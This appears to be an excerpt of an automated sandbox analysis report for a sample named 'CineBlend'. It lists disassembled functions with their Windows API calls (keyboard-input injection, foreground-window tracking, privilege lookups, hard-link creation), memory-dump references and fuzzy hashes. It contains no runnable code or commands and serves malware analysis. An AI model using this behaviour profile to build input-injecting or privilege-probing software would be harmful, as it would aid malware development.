Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367af48eb4f2e59e59b1f97f838e4126a3c17f455f612aae54801872dd068567
Instruction ID: 9a23ea5572abccb9ddcef9770ba4df0893261fbcd465c0349c7d0b0e486d2fc7
Opcode Fuzzy Hash: 367af48eb4f2e59e59b1f97f838e4126a3c17f455f612aae54801872dd068567
Instruction Fuzzy Hash: 6241E672A00704AFD725AF78CC41F6ABBFDEB88710F1085AAF115DB291D779DA418780

Function 00BA611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BA61C8
GetLastError.KERNEL32(?,00000000), ref: 00BA61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BA6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BA623F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: edf383ee8e060d8000fcc9450756fedb9b789f349597fd14a40bd0b7cf11fe1a
Instruction ID: 6031c99f7a2864150cad0599768905f58eff6cec4c9cfcbab3c9b030cf8b8497
Opcode Fuzzy Hash: edf383ee8e060d8000fcc9450756fedb9b789f349597fd14a40bd0b7cf11fe1a
Instruction Fuzzy Hash: 04412779600610DFCB11EF15C585A1ABBF2EF89710F2984D8E84AAB362CB34FD01CB91

Function 00B6DC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00B570E1,00000000,00000000,00B58649,?,00B58649,?,00000001,00B570E1,8BE85006,00000001,00B58649,00B58649), ref: 00B6DC90
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B6DD19
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B6DD2B
__freea.LIBCMT ref: 00B6DD34

Part of subcall function 00B63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63BC5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2523bc55daff03fbdd107fd3bbfa6992342ecb61c1aef665fceafb882cbc022a
Instruction ID: a64211cc2958c15d0bc091e4c97b4561395e4aed1711283f57cc6068b991dd7f
Opcode Fuzzy Hash: 2523bc55daff03fbdd107fd3bbfa6992342ecb61c1aef665fceafb882cbc022a
Instruction Fuzzy Hash: C731BE32A0020AABDF249F64DC85EAE7BE5EF41710B1541B8FC09D7190EB39CD55CBA0

Function 00B9B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B9B473
SetKeyboardState.USER32(00000080), ref: 00B9B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B9B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B9B54F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8748c8b66bb7b47958313cd956e0f91f25d0ac14eddc4ab7cad0648db57f2f35
Instruction ID: 95ab0a6f5dd082ddbb3a1309f21418db849af700d5fd4014885db49066793416
Opcode Fuzzy Hash: 8748c8b66bb7b47958313cd956e0f91f25d0ac14eddc4ab7cad0648db57f2f35
Instruction Fuzzy Hash: 53316870A002086EFF30CB25A955FFE7BF5EF59310F1482BAE496963D2C7748A4197A1

Function 00BC5D5F Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00BC5DF0
GetWindowLongW.USER32(?,000000F0), ref: 00BC5E13
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BC5E20
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BC5E46

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 21819f0e37b6a85b2e0c3994525493d74e5aad4dda2c770c5a0f924ef703063c
Instruction ID: 94e15a22145a954fbfe6bea7236ce31b0390c85c49c32b99454bcb783b6421ae
Opcode Fuzzy Hash: 21819f0e37b6a85b2e0c3994525493d74e5aad4dda2c770c5a0f924ef703063c
Instruction Fuzzy Hash: 6D31AD34A51B09AFEB349F14CC49FE837E5EB04350F1841AAF612962E1CB30BAC0DB41

Function 00B9B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B9B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B9B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B9B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B9B68D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9daf7344c23529cf5b532fc667ad4a7ef5bf524aad341230fd8f19c99fb18b1a
Instruction ID: b3c32f68418479087a8da2d5396f7dbbba791490648a5c8ef1194813c861a352
Opcode Fuzzy Hash: 9daf7344c23529cf5b532fc667ad4a7ef5bf524aad341230fd8f19c99fb18b1a
Instruction Fuzzy Hash: 39312B30940608AEFF348F659905FFAFBE6EF99310F0442BEE481961D1C774AA45CB91

Function 00BC80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00BC80D4
GetWindowRect.USER32(?,?), ref: 00BC814A
PtInRect.USER32(?,?,?), ref: 00BC815A
MessageBeep.USER32(00000000), ref: 00BC81C6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 67fb34cc6ee0de515d1a49a1ec77c0e70a87cd914a15b9c045c3ea7da92f13a8
Instruction ID: 31e080b0264bc2a8ef0fbba3e4942a858fc8a05d3d0f2ff5eda56c305cd328f7
Opcode Fuzzy Hash: 67fb34cc6ee0de515d1a49a1ec77c0e70a87cd914a15b9c045c3ea7da92f13a8
Instruction Fuzzy Hash: 2A415834A01215DFCB11CF59C884FA9BBF5FB4D324F1941ACE955AB261CB31A842CB90

Function 00BC2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00BC2187

Part of subcall function 00B94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B943AD
Part of subcall function 00B94393: GetCurrentThreadId.KERNEL32 ref: 00B943B4
Part of subcall function 00B94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B92F00), ref: 00B943BB

GetCaretPos.USER32(?), ref: 00BC219B
ClientToScreen.USER32(00000000,?), ref: 00BC21E8
GetForegroundWindow.USER32 ref: 00BC21EE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d7ea94d5a32ec31822aa11f07b1bf507ec44cc915361fdd51724268de89c3a46
Instruction ID: 5bc44377492809eea40c7bb8587f74f12db04aecdb5ea00983d1521b6c6b67da
Opcode Fuzzy Hash: d7ea94d5a32ec31822aa11f07b1bf507ec44cc915361fdd51724268de89c3a46
Instruction Fuzzy Hash: E83152B5D00209AFCB04DFA5C881DAEB7FCEF48304B5444AAE415E7251DB71DE45CBA0

Function 00B9E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00B341EA: _wcslen.LIBCMT ref: 00B341EF

_wcslen.LIBCMT ref: 00B9E8E2
_wcslen.LIBCMT ref: 00B9E8F9
_wcslen.LIBCMT ref: 00B9E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B9E92F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: ec1c57349c4e29f2433f92ff96ee182e08e9aa844cecf64fdad5fb599797f38d
Instruction ID: 2c5a55a6d5935a3235ca2bc85493158656c46a6c6a6d0c4e0a07ce35e2fe5c83
Opcode Fuzzy Hash: ec1c57349c4e29f2433f92ff96ee182e08e9aa844cecf64fdad5fb599797f38d
Instruction Fuzzy Hash: F1219F71900615AFDB10EFA8D982BAEB7F8EF45351F2440E5E914BB241D7709E418BA1

Function 00BC9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

GetCursorPos.USER32(?), ref: 00BC9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BC9A72
GetCursorPos.USER32(?), ref: 00BC9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00BC9AF0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2cc83abec51c8907dd5fab9145867b6dee595d144ea596d7b7971c56edef434a
Instruction ID: ba9409c90efae1e6938a8ef4eaa7e9a836b52731ac3fea8029d98071302f4a81
Opcode Fuzzy Hash: 2cc83abec51c8907dd5fab9145867b6dee595d144ea596d7b7971c56edef434a
Instruction Fuzzy Hash: 10219A36600018BFEF258F94C88CFEE7BF9EB49750F5041A9FA058B2A1D7319950DB60

Function 00B9DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00BCDC30), ref: 00B9DBA6
GetLastError.KERNEL32 ref: 00B9DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B9DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BCDC30), ref: 00B9DC21

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c13789335d175ff3c086ee07e1ff5cdd7e47012fd9d9fddd8c591b2e2470f03c
Instruction ID: 25927ce72a1134fecaf47f008ef9043e3e05c89ff091764b612dca39196258d4
Opcode Fuzzy Hash: c13789335d175ff3c086ee07e1ff5cdd7e47012fd9d9fddd8c591b2e2470f03c
Instruction Fuzzy Hash: 7E2195745083059F8B10DF29C98099BB7F8EE59364F204ABDF499C72A1DB31D946CB52

Function 00B91EBD Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B91960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B91976
Part of subcall function 00B91960: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B91982
Part of subcall function 00B91960: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B91991
Part of subcall function 00B91960: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B91998
Part of subcall function 00B91960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B919AE

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B91F0A
_memcmp.LIBVCRUNTIME ref: 00B91F2D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B91F63
HeapFree.KERNEL32(00000000), ref: 00B91F6A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: f45369e6267b390ba0bfc55207a7d965a7f918dc32c8eba4cca5eec4df5f7b46
Instruction ID: bff1ba2c87ff455dead37626f1fc0828e048664b73c0a4aaa1e68e6f955b6193
Opcode Fuzzy Hash: f45369e6267b390ba0bfc55207a7d965a7f918dc32c8eba4cca5eec4df5f7b46
Instruction Fuzzy Hash: FC216D71E4010AAFDF10DFA8C945BEEB7F8EF44345F1548A9E855AB250D730AA05DBA0

Function 00BC321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00BC32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BC32DC

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 2f6657296fc41f61268914347775b96fa5e17c63fbfeaada1a94f441bca41494
Instruction ID: 54bc705205b3cf56abfdb0b33ee2f4c74b32b3c0b2c998f8652398a4f18fbcb7
Opcode Fuzzy Hash: 2f6657296fc41f61268914347775b96fa5e17c63fbfeaada1a94f441bca41494
Instruction Fuzzy Hash: FD21B031204511AFDB149B24C845F6ABBD5EF85724F64C29DF8268B2D2CB71ED41CBD0

Function 00B9825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B98271,?,000000FF,?,00B990BB,00000000,?,0000001C,?,?), ref: 00B996F3
Part of subcall function 00B996E4: lstrcpyW.KERNEL32(00000000,?,?,00B98271,?,000000FF,?,00B990BB,00000000,?,0000001C,?,?,00000000), ref: 00B99719
Part of subcall function 00B996E4: lstrcmpiW.KERNEL32(00000000,?,00B98271,?,000000FF,?,00B990BB,00000000,?,0000001C,?,?), ref: 00B9974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B990BB,00000000,?,0000001C,?,?,00000000), ref: 00B9828A
lstrcpyW.KERNEL32(00000000,?,?,00B990BB,00000000,?,0000001C,?,?,00000000), ref: 00B982B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B990BB,00000000,?,0000001C,?,?,00000000), ref: 00B982EB

Strings

cdecl, xrefs: 00B982E2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b3baeef967ef5009812385306a1b5228aa4f271c69761842dfbca046ca3211ca
Instruction ID: 4ccde57ea66ce17cbdb23ec0d29469b2fb58fbd16502eec77e8b5c72bf9cef3d
Opcode Fuzzy Hash: b3baeef967ef5009812385306a1b5228aa4f271c69761842dfbca046ca3211ca
Instruction Fuzzy Hash: 9711037A200241ABCF14AF38C844E7A77E9FF4A750B1040BAF902C7260EF319811C795

Function 00BC60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00BC615A
_wcslen.LIBCMT ref: 00BC616C
_wcslen.LIBCMT ref: 00BC6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BC62B5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 85b5ec6669b04acd75ca031719b942c1838076c900b99a8db46909742d17c813
Instruction ID: d08ca9de4c540630d13b28e7648a752417e4a8a95aa2c19ad12d076585314c33
Opcode Fuzzy Hash: 85b5ec6669b04acd75ca031719b942c1838076c900b99a8db46909742d17c813
Instruction Fuzzy Hash: 65119075600218A6DB20DFA48CC4FEF77FCEB55354B1441AEFA11E6081EBB0D984CB64

Function 00B62079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fea889d49825cce5eb60dc6cec7bd54d441f40cadf0b14096bd41fe3ce8f22
Instruction ID: 588e29733c17b75fcc2250bd6634089911e635f34fdbdbdde52944a5150569fd
Opcode Fuzzy Hash: d4fea889d49825cce5eb60dc6cec7bd54d441f40cadf0b14096bd41fe3ce8f22
Instruction Fuzzy Hash: 3F01D1B2609A167EFA212778ACC1F6B678DDF427B8B3403B5F925A11D1DF688C40D160

Function 00B92374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B92394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B923A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B923BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B923D7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 652b9372ec6c44534021cdd11d9eef522d55ca33f0bd957138b87655409f1305
Instruction ID: 02a8caf21c973ff39671b6671be3aaef825c6f2e4b45f2b22bc1d0725896e6fa
Opcode Fuzzy Hash: 652b9372ec6c44534021cdd11d9eef522d55ca33f0bd957138b87655409f1305
Instruction Fuzzy Hash: 5711F73AD01218FFEF119BA5CD85F9DBBB8EB08750F2000A1EA01B7290D6716E10DB94

Function 00B31AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B31AF4
GetClientRect.USER32(?,?), ref: 00B731F9
GetCursorPos.USER32(?), ref: 00B73203
ScreenToClient.USER32(?,?), ref: 00B7320E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

